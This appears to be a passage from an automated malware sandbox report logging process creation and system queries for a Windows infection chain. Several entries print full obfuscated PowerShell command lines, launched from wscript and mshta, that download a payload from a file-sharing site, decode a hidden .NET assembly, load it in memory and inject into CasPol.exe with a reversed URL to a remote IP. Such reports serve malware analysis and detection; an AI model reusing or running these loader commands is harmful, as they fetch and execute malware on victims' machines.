ucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdv0ziagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkzc10exblicagicagicagicagicagicagicagicagicagicagicagic1tzw1czxjezwzjbkluaw9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbuy2twtgosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifzjvixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrvhsblbkcnbouwmsdwludcagicagicagicagicagicagicagicagicagicagicagicbirwp6leludfb0ciagicagicagicagicagicagicagicagicagicagicagicb5wlztc0rnzgrpktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpqxl3bmkiicagicagicagicagicagicagicagicagicagicagicagic1oqu1lu1bhq2ugicagicagicagicagicagicagicagicagicagicagicagsxjseiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq1dgy6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjkvnduvc2vlagf2aw5nzmfjaw5nymvzdhroawduc3rvz2v0bwviywnrd2l0agvudglyzxrpbwvncmvhdc50suyilcikru5wokfquerbvefcc2vlagf2aw5nzmfjaw5nymvzdhroawduc3rvz2v0bwviywnrd2l0agvudglyzxrpbwvncmuudmjtiiwwldapo3n0qxjulxnsruvwkdmpo0lfwcagicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzwhhdmluz2zhy2luz2jlc3r0aglnbnn0b2dldg1lymfja3dpdghlbnrpcmv0aw1lz3jllnziuyi='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicr2zxjcb1nlchjfrmvyzu5dzs5ut3n0cklurygpwzesm10rj1gnluppau4njykokcdvcglpbwfnzvvybca9iglmzgh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0jysnnxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5usunmrmgnkydtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9jysnzmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngygawzko29waxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7b3bpaw1hz2vcexrlcya9ig9waxdlyknsawvudc5eb3dubg9hzerhdgeob3bpaw1hz2vvcmwpo29wawltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkg8nkydwawltywdlqnl0zxmpo29waxn0yxj0rmxhzya9iglmzdw8qkftrty0x1nuqvjupj5pzmq7b3bpzw5krmxhzya9iglmzdw8qkftrty0x0vord4+awzko29waxn0yxj0sw5kzxggpsbvcglpbwfnzvrlehqusw5kzxhpzihvjysncglzjysndgfydezsywcpo29wawvuzeluzgv4id0gb3bpaw1hz2vuzxh0lkluzgv4t2yob3bpzw5krmxhzyk7b3bpc3rhcnrjbmrlecatjysnz2ugmcatyw5kig9wawvuzeluzgv4ic1ndcbvcglzdgfydeluzgunkyd4o29waxn0yxj0sw5kzxggkz0gb3bpc3rhcnrgbgfnlkxlbmd0adtvcccrj2liyxnlnjrmzw5ndgggpsbvcgllbmrjbmrlecatig9waxn0yxj0sw5kzxg7b3bpymfzzty0q29tbwfuzca9ig9wawltywdlvgv4dc5tdwjzdccrj3jpbmcob3bpc3rhcnqnkydjbmrlecwgb3bpymfzzty0tgvuz3rokttvcgliyxnlnjrszxzlcnnlzca9ic1qbycrj2luichvcgliyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgmfenkydsiezvckvhy2gtt2jqzwn0ihsgb3bpxyb9kvsnkyctms4ulshvcgliyxnlnjrdb21tyw5klkxlbmd0acldo29wawnvbw1hbmrcexrlcya9ifttescrj3n0zw0uq29udicrj2unkydydf06okzyb21cyxnljysnnjrtdhjpbmcob3bpymfzzty0umv2zxjzzwqpo29wawxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw8nkydulkfzc2vtymx5xto6tg9hzchvcgljb21tyw5kqnl0zxmpo29waxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoawynkydkvkfjawzkjysnkttvcgl2ywlnzxrob2qusw52b2tlkg9waw51bgwsieaoawzkdhh0lkderfjesc81nc85mi4nkycwmjiumy4yotevlzpwdhroawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrdyxnqb2xpzmqsiglmzgrlc2f0axynkydhzg8nkydpzmqsiglmzgrlc2f0jysnaxzhzg9pzmqsawzkzgvzyxrpdmfkb2lmzcxpzmrkzxnhdgl2ywrvawzklglmzgrlc2f0axzhzg9pzmqsawzkzgvzyxrpdmfkb2lmzcxpzmrkzxnhdccrj2l2ywrvawzklglmzdfpzmqsawzkzgvzyxrpdmfkb2lmjysnzckpoycplnjluexbq2uojzbrbccsw1n0cmlur11bq2hbcl0xmjqplnjluexbq2uoj2lmzccsw1n0cmlur11bq2hbcl0zoskucmvqtefdzsgow0noqxjdmtexk1tdaefyxtexmitbq2hbcl0xmduplcckjykp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $verbosepreference.tostring()[1,3]+'x'-join'')(('opiimageurl = ifdhttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu4'+'5t7bu1kvgsd9pt9pgsslvstgrnticffh'+'mtkj3lc6sqticoc_t35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebclient = new-object system.net.webclient;opiimagebytes = opiwebclient.downloaddata(opiimageurl);opiimagetext = [system.text.encoding]::utf8.getstring(o'+'piimagebytes);opistartflag = ifd<<base64_start>>ifd;opiendflag = ifd<<base64_end>>ifd;opistartindex = opiimagetext.indexof(o'+'pis'+'tartflag);opiendindex = opiimagetext.indexof(opiendflag);opistartindex -'+'ge 0 -and opiendindex -gt opistartinde'+'x;opistartindex += opistartflag.length;op'+'ibase64length = opiendindex - opistartindex;opibase64command = opiimagetext.subst'+'ring(opistart'+'index, opibase64length);opibase64reversed = -jo'+'in (opibase64command.tochararray() 0q'+'l foreach-object { opi_ })['+'-1..-(opibase64command.length)];opicommandbytes = [sy'+'stem.conv'+'e'+'rt]::frombase'+'64string(opibase64reversed);opiloadedassembly = [system.reflectio'+'n.assembly]::load(opicommandbytes);opivaimethod = [dnlib.io.home].getmethod(if'+'dvaiifd'+');opivaimethod.invoke(opinull, @(ifdtxt.gddrdh/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdcaspolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').replace('0ql',[string][char]124).replace('ifd',[string][char]39).replace(([char]111+[char]112+[char]105),'$'))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdv0ziagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkzc10exblicagicagicagicagicagicagicagicagicagicagicagic1tzw1czxjezwzjbkluaw9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbuy2twtgosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifzjvixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrvhsblbkcnbouwmsdwludcagicagicagicagicagicagicagicagicagicagicagicbirwp6leludfb0ciagicagicagicagicagicagicagicagicagicagicagicb5wlztc0rnzgrpktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpqxl3bmkiicagicagicagicagicagicagicagicagicagicagicagic1oqu1lu1bhq2ugicagicagicagicagicagicagicagicagicagicagicagsxjseiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq1dgy6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjkvnduvc2vlagf2aw5nzmfjaw5nymvzdhroawduc3rvz2v0bwviywnrd2l0agvudglyzxrpbwvncmvhdc50suyilcikru5wokfquerbvefcc2vlagf2aw5nzmfjaw5nymvzdhroawduc3rvz2v0bwviywnrd2l0agvudglyzxrpbwvncmuudmjtiiwwldapo3n0qxjulxnsruvwkdmpo0lfwcagicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzwhhdmluz2zhy2luz2jlc3r0aglnbnn0b2dldg1lymfja3dpdghlbnrpcmv0aw1lz3jllnziuyi='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicr2zxjcb1nlchjfrmvyzu5dzs5ut3n0cklurygpwzesm10rj1gnluppau4njykokcdvcglpbwfnzvvybca9iglmzgh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0jysnnxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5usunmrmgnkydtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9jysnzmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngygawzko29waxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7b3bpaw1hz2vcexrlcya9ig9waxdlyknsawvudc5eb3dubg9hzerhdgeob3bpaw1hz2vvcmwpo29wawltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkg8nkydwawltywdlqnl0zxmpo29waxn0yxj0rmxhzya9iglmzdw8qkftrty0x1nuqvjupj5pzmq7b3bpzw5krmxhzya9iglmzdw8qkftrty0x0vord4+awzko29waxn0yxj0sw5kzxggpsbvcglpbwfnzvrlehqusw5kzxhpzihvjysncglzjysndgfydezsywcpo29wawvuzeluzgv4id0gb3bpaw1hz2vuzxh0lkluzgv4t2yob3bpzw5krmxhzyk7b3bpc3rhcnrjbmrlecatjysnz2ugmcatyw5kig9wawvuzeluzgv4ic1ndcbvcglzdgfydeluzgunkyd4o29waxn0yxj0sw5kzxggkz0gb3bpc3rhcnrgbgfnlkxlbmd0adtvcccrj2liyxnlnjrmzw5ndgggpsbvcgllbmrjbmrlecatig9waxn0yxj0sw5kzxg7b3bpymfzzty0q29tbwfuzca9ig9wawltywdlvgv4dc5tdwjzdccrj3jpbmcob3bpc3rhcnqnkydjbmrlecwgb3bpymfzzty0tgvuz3rokttvcgliyxnlnjrszxzlcnnlzca9ic1qbycrj2luichvcgliyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgmfenkydsiezvckvhy2gtt2jqzwn0ihsgb3bpxyb9kvsnkyctms4ulshvcgliyxnlnjrdb21tyw5klkxlbmd0acldo29wawnvbw1hbmrcexrlcya9ifttescrj3n0zw0uq29udicrj2unkydydf06okzyb21cyxnljysnnjrtdhjpbmcob3bpymfzzty0umv2zxjzzwqpo29wawxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw8nkydulkfzc2vtymx5xto6tg9hzchvcgljb21tyw5kqnl0zxmpo29waxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoawynkydkvkfjawzkjysnkttvcgl2ywlnzxrob2qusw52b2tlkg9waw51bgwsieaoawzkdhh0lkderfjesc81nc85mi4nkycwmjiumy4yotevlzpwdhroawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrdyxnqb2xpzmqsiglmzgrlc2f0axynkydhzg8nkydpzmqsiglmzgrlc2f0jysnaxzhzg9pzmqsawzkzgvzyxrpdmfkb2lmzcxpzmrkzxnhdgl2ywrvawzklglmzgrlc2f0axzhzg9pzmqsawzkzgvzyxrpdmfkb2lmzcxpzmrkzxnhdccrj2l2ywrvawzklglmzdfpzmqsawzkzgvzyxrpdmfkb2lmjysnzckpoycplnjluexbq2uojzbrbccsw1n0cmlur11bq2hbcl0xmjqplnjluexbq2uoj2lmzccsw1n0cmlur11bq2hbcl0zoskucmvqtefdzsgow0noqxjdmtexk1tdaefyxtexmitbq2hbcl0xmduplcckjykp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $verbosepreference.tostring()[1,3]+'x'-join'')(('opiimageurl = ifdhttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu4'+'5t7bu1kvgsd9pt9pgsslvstgrnticffh'+'mtkj3lc6sqticoc_t35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebclient = new-object system.net.webclient;opiimagebytes = opiwebclient.downloaddata(opiimageurl);opiimagetext = [system.text.encoding]::utf8.getstring(o'+'piimagebytes);opistartflag = ifd<<base64_start>>ifd;opiendflag = ifd<<base64_end>>ifd;opistartindex = opiimagetext.indexof(o'+'pis'+'tartflag);opiendindex = opiimagetext.indexof(opiendflag);opistartindex -'+'ge 0 -and opiendindex -gt opistartinde'+'x;opistartindex += opistartflag.length;op'+'ibase64length = opiendindex - opistartindex;opibase64command = opiimagetext.subst'+'ring(opistart'+'index, opibase64length);opibase64reversed = -jo'+'in (opibase64command.tochararray() 0q'+'l foreach-object { opi_ })['+'-1..-(opibase64command.length)];opicommandbytes = [sy'+'stem.conv'+'e'+'rt]::frombase'+'64string(opibase64reversed);opiloadedassembly = [system.reflectio'+'n.assembly]::load(opicommandbytes);opivaimethod = [dnlib.io.home].getmethod(if'+'dvaiifd'+');opivaimethod.invoke(opinull, @(ifdtxt.gddrdh/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdcaspolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').replace('0ql',[string][char]124).replace('ifd',[string][char]39).replace(([char]111+[char]112+[char]105),'$'))"Jump to behavior
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerO3\
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerO3\0
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, logs.dat.18.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00433E0A cpuid 18_2_00433E0A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,18_2_0040E679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,18_2_004470AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,18_2_004510BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_004511E3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,18_2_004512EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_004513B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,18_2_00447597
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,18_2_00450A7F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,18_2_00450CF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,18_2_00450D42
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,18_2_00450DDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,18_2_00450E6A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
